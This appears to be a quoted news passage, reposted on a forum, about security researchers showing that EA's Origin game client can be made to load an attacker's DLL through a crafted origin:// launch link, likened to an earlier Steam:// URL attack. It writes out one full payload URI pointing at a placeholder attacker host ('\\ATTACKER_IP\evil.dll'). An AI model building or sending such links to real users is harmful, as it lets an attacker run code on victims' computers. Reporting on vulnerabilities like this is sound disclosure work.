The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.
The attack is similar to an exploit the same researchers demonstrated in October on Steam, a competing online game platform from Valve, with 50 million users. The earlier attack relied on booby-trapped URLs starting with "Steam://" to trick browsers, games, e-mail clients, and other applications into executing code that could compromise the security of the underlying computer. At the time, the researchers advised vulnerable end users to protect themselves against exploits by disabling the automatic launching of Steam:// URLs.
Click to expand...
Problems? See this thread at archive.org.
